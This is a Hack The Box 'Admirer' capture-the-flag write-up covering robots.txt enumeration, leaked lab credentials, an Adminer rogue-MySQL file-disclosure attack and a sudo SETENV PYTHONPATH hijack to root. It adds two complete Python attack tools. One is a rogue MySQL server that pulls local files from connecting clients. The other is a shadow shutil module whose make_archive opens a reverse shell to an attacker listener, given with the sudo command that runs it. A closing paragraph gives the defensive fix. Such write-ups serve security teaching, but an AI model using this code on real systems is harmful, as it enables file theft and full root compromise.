Admirer was an easy-difficulty machine on Hack The Box. Here’s my take on solving the challenge.

Admirer

User

Nmap reveals three running services:

Nmap scan

FTP doesn’t allow anonymous connections. On the other hand, robots.txt on the web server reveals an interesting directory:

User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

The comment also hints at what kind of files to look for in that directory. Indeed, admin-dir/credentials.txt yields a couple of logins with passwords:

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

The FTP account works and gives access to two files:

FTP access

Unpacking html.tar.gz reveals the folder structure of the web application. Unfortunately it seems to be an outdated version: for example, w4ld0s_s3cr3t_d1r was later renamed to admin-dir, and the database credentials in index.php are wrong and contain a syntax error:

Broken credentials

Nevertheless, the archive reveals another important directory: utility-scripts. The scripts in that directory are not very useful to an attacker, but enumerating the directory reveals one more script:

Dirb scan of utility-scripts

adminer.php is an instance of Adminer, a single-file database administration tool, and the version in use has a known file disclosure vulnerability. Adminer lets the user connect to any MySQL server, and the connection is made from the web server itself, so a rogue MySQL server under the attacker's control can answer the client's first query with a LOAD DATA LOCAL INFILE request, and the PHP MySQL client then sends back the contents of whichever local file the rogue server names. A rogue MySQL server script can be used for this; the attacker needs to modify the script and add the local paths of the files they want to read:

Example file list

After starting the rogue MySQL server, adminer.php can be pointed at the attacker's machine as the database host:

Adminer

After that, the rogue server's mysql.log will contain the content of index.php, this time with working credentials:

$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
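Below is an added example of the rogue-server side of this attack, written for this page and not taken from the original write-up or from any particular rogue-MySQL-server project. It implements only the protocol pieces the exchange needs: a protocol-10 greeting, an OK for whatever credentials Adminer sends, and a 0xFB LOAD DATA LOCAL INFILE reply to the first COM_QUERY, after which the client's file packets are collected. The target path, the listening port, the log file name and the constructed fake client inside demo_loopback are assumptions; real use is serve(target_path) on the attacker machine with Adminer pointed at it.

```python
import socket
import struct
import threading

CLIENT_LOCAL_FILES, CLIENT_PROTOCOL_41, CLIENT_SECURE_CONNECTION = 0x0080, 0x0200, 0x8000
# Server capabilities: LONG_PASSWORD|FOUND_ROWS|LONG_FLAG|CONNECT_WITH_DB|LOCAL_FILES|PROTOCOL_41
# |TRANSACTIONS|SECURE_CONNECTION|PLUGIN_AUTH; deliberately no CLIENT_SSL, so the client stays in plaintext.
SERVER_CAPS = 0x1 | 0x2 | 0x4 | 0x8 | 0x80 | 0x200 | 0x2000 | 0x8000 | 0x80000
OK_PACKET = b"\x00\x00\x00\x02\x00\x00\x00"  # OK, 0 rows, 0 insert id, autocommit, 0 warnings
COM_QUERY = b"\x03"

def frame(payload, seq):
    """MySQL packet framing: 3-byte little-endian length, 1-byte sequence id, payload."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload

def read_packet(sock):
    """Return (sequence id, payload) of the next packet on sock."""
    def exact(n):
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("peer closed the connection")
            buf += chunk
        return buf
    header = exact(4)
    return header[3], exact(int.from_bytes(header[:3], "little"))

def build_handshake(version=b"5.7.29-rogue", salt=b"A" * 20):
    """Protocol-10 greeting packet; the values are arbitrary but well-formed."""
    return (b"\x0a" + version + b"\x00" + struct.pack("<I", 1)    # protocol, version, conn id
            + salt[:8] + b"\x00"                                   # auth data part 1, filler
            + struct.pack("<HBHH", SERVER_CAPS & 0xFFFF, 0x21, 2, SERVER_CAPS >> 16)  # caps lo, charset, status, caps hi
            + bytes([len(salt) + 1]) + b"\x00" * 10                # auth data length, reserved
            + salt[8:] + b"\x00" + b"mysql_native_password\x00")   # auth data part 2, plugin name

def parse_handshake_response(payload):
    """Capability flags and user name from the client's protocol-4.1 handshake response."""
    caps = struct.unpack_from("<I", payload, 0)[0]
    if not caps & CLIENT_PROTOCOL_41:
        raise ValueError("pre-4.1 client response is not handled by this example")
    user = payload[32:].split(b"\x00", 1)[0].decode(errors="replace")
    return {"user": user, "local_files": bool(caps & CLIENT_LOCAL_FILES)}

def handle_client(conn, target_path):
    """Greet, accept any credentials, then answer the first COM_QUERY with a LOAD DATA LOCAL
    INFILE request for target_path. Returns (client info, bytes the client sent back)."""
    conn.sendall(frame(build_handshake(), 0))
    seq, response = read_packet(conn)
    info = parse_handshake_response(response)
    conn.sendall(frame(OK_PACKET, seq + 1))             # "login" always succeeds
    while True:
        seq, command = read_packet(conn)
        if command[:1] != COM_QUERY:                    # COM_PING, COM_INIT_DB, ...: plain OK
            conn.sendall(frame(OK_PACKET, seq + 1))
            continue
        conn.sendall(frame(b"\xfb" + target_path.encode(), seq + 1))  # 0xFB: local infile request
        data = b""
        while True:                                     # file arrives in packets, then an empty one
            seq, chunk = read_packet(conn)
            if not chunk:
                break
            data += chunk
        conn.sendall(frame(OK_PACKET, seq + 1))
        return info, data

def serve(target_path, port=3306, logfile="mysql.log"):
    """Real use: listen on all interfaces and append each disclosed file to logfile."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("", port)); srv.listen()
        while True:
            conn, addr = srv.accept()
            with conn, open(logfile, "ab") as log:
                info, data = handle_client(conn, target_path)
                log.write(f"# {addr[0]} {info}\n".encode() + data + b"\n")

def demo_loopback(target_path, file_bytes):
    """Offline run against a constructed, minimal mysqli-like client on a socketpair. A real
    client would open target_path itself; the fake one sends file_bytes in its place."""
    srv, cli = socket.socketpair()
    result = {}
    worker = threading.Thread(target=lambda: result.update(served=handle_client(srv, target_path)))
    worker.start()
    seq, greeting = read_packet(cli)                    # greeting, sequence id 0
    caps = CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_LOCAL_FILES
    login = struct.pack("<IIB", caps, 1 << 24, 0x21) + b"\x00" * 23 + b"adminer\x00\x00"
    cli.sendall(frame(login, seq + 1))
    read_packet(cli)                                    # OK for the login
    cli.sendall(frame(COM_QUERY + b"SET NAMES utf8mb4", 0))
    seq, request = read_packet(cli)
    requested = request[1:].decode() if request[:1] == b"\xfb" else None
    cli.sendall(frame(file_bytes, seq + 1))
    cli.sendall(frame(b"", seq + 2))
    read_packet(cli)                                    # OK for the upload
    worker.join(); srv.close(); cli.close()
    return requested, result["served"]
```

Whether the client actually hands the file over is the client's decision: it only does so if it advertised CLIENT_LOCAL_FILES in its handshake response, which for PHP's mysqli depends on the mysqli.allow_local_infile setting. That is why handle_client records the flag per connection; a log line showing local_files=False tells you straight away that the path is not going to arrive, whatever the rogue server sends.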

As it turns out, waldo's database credentials from index.php are reused for SSH, giving user access and the user flag:

User access

Privilege escalation

Sudo allows the waldo user to run the admin_tasks.sh script, and the sudoers entry carries the SETENV tag:

Sudo settings

The script runs various administrative tasks depending on the option number passed as an argument:

admin_tasks

Option number 6, backup_web, runs a Python script, which imports the make_archive function from the shutil library and calls it:

Backup.py script

Because the attacker controls the environment (SETENV means variables set on the sudo command line are exempt from sudo's env_reset and env_delete, which would otherwise strip PYTHONPATH), they can prepend a directory of their own to PYTHONPATH and shadow the shutil library with their own module, for example one whose make_archive launches a reverse shell:

Overwriting the make_archive function

Now running the script through sudo with PYTHONPATH overridden should execute the reverse shell with root privileges:

Running privesc script
Root reverse shell
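The following is an added example of the shadow-module technique described above; it is not the write-up's own payload. The script path /opt/scripts/admin_tasks.sh, the listener 10.10.14.2:4444 and the temporary directory are assumptions (the write-up gives only the script name and the option number). stage() writes a shutil.py whose make_archive opens a reverse shell, then proves in a fresh interpreter that `from shutil import make_archive` resolves to that file when PYTHONPATH points at its directory, without calling make_archive; sudo_command() is the final invocation, to be run as waldo with a listener waiting.

```python
import os
import subprocess
import sys
import tempfile

LHOST, LPORT = "10.10.14.2", 4444            # assumed attacker listener (nc -lvnp 4444)
ADMIN_TASKS = "/opt/scripts/admin_tasks.sh"  # assumed location of the sudo-allowed script
BACKUP_OPTION = "6"                          # backup_web, the option that runs the Python script

# The shadow module. The backup script only does `from shutil import make_archive`, so that is
# the only name we must provide; the real shutil is never loaded because ours is earlier on
# sys.path. It must not import tempfile (which imports shutil, i.e. itself) or anything else that does.
SHADOW_SHUTIL = f'''\
import os, socket, subprocess

def make_archive(*args, **kwargs):
    s = socket.create_connection(({LHOST!r}, {LPORT}))   # call back to the attacker
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)                           # wire stdin/stdout/stderr to the socket
    subprocess.call(["/bin/sh", "-i"])                    # runs as root under sudo
'''

def write_shadow(directory):
    """Drop shutil.py into directory and return its path."""
    path = os.path.join(directory, "shutil.py")
    with open(path, "w") as f:
        f.write(SHADOW_SHUTIL)
    return path

def shutil_seen_by(pythonpath_dir):
    """Start a fresh interpreter with PYTHONPATH=pythonpath_dir and report which file its
    `from shutil import make_archive` resolved to. make_archive is imported, not called,
    so this probe never opens a connection."""
    probe = "from shutil import make_archive; import shutil; print(shutil.__file__)"
    env = dict(os.environ, PYTHONPATH=pythonpath_dir)
    out = subprocess.run([sys.executable, "-c", probe], env=env,
                         capture_output=True, text=True, check=True)
    return os.path.realpath(out.stdout.strip())

def sudo_command(pythonpath_dir):
    """The final invocation. SETENV in sudoers is what lets the VAR=value on the sudo command
    line survive: PYTHONPATH is on sudo's default env_delete list and would otherwise be dropped."""
    return ["sudo", f"PYTHONPATH={pythonpath_dir}", ADMIN_TASKS, BACKUP_OPTION]

def stage():
    """Write the shadow module to a fresh directory and confirm it wins the import."""
    directory = tempfile.mkdtemp(prefix="shadow_")
    shadow = write_shadow(directory)
    hijacked = shutil_seen_by(directory) == os.path.realpath(shadow)
    return shadow, hijacked

if __name__ == "__main__":
    shadow, hijacked = stage()
    print("shadow module:", shadow, "| import hijacked:", hijacked)
    print("run as waldo:", " ".join(sudo_command(os.path.dirname(shadow))))
```

The defensive counterpart sits on the same sudoers line: drop the SETENV tag so sudo's env_reset keeps stripping PYTHONPATH, and have scripts that sudo may run invoke python3 with -I (or at least -E), which makes the interpreter ignore PYTHON* environment variables altogether.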